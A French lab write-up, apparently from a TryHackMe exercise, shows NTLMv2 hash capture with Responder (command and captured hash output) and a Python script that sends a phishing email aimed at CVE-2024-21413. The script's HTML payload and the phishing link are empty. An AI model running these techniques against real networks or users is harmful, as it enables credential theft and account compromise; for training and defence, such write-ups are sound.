
Démontre la capture de hachages NTLM via Responder et l'exécution d'e-mails de phishing exploitant CVE-2024-21413 pour compromettre des systèmes.
Objectif du projet : Ce projet a été créé pour démontrer l'utilisation de divers outils pour capturer des hachages NTLM d'utilisateurs sur un réseau et pour exécuter des attaques de phishing par email. Cela montre comment les vulnérabilités d'authentification réseau et les méthodes de phishing peuvent être exploitées pour compromettre des systèmes.
Description du processus
J'ai exécuté la commande suivante pour lancer Responder :
root@ip-10-10-192-145:~# sudo responder -I ens5
J'ai configuré Responder pour écouter sur l'interface ens5. Il a immédiatement commencé à intercepter les requêtes d'authentification, ce qui m'a permis de visualiser les hachages NTLM des utilisateurs sur le réseau, tels que THM-MONIKERLINK\tryhackme et WORKGROUP\Administrator. Voici à quoi ressemblait la sortie lors de la capture des hachages :
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
Ces hachages peuvent ensuite être utilisés pour des attaques telles que le brute force ou les attaques par hachage.
Le lien de phishing dans l'email ressemblait à ceci :
Voici le script Python complet utilisé pour envoyer l'email de phishing :import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
Ce script envoie un email avec un lien malveillant, qui pourrait potentiellement exploiter la vulnérabilité CVE-2024-21413.
Résultats En conséquence, j'ai pu démontrer deux aspects clés :
Ce projet a montré comment les vulnérabilités réseau et les attaques de phishing peuvent être exploitées pour accéder aux systèmes. Il a également souligné l'importance de se défendre contre de telles attaques grâce à des méthodes d'authentification fortes et au filtrage du trafic email.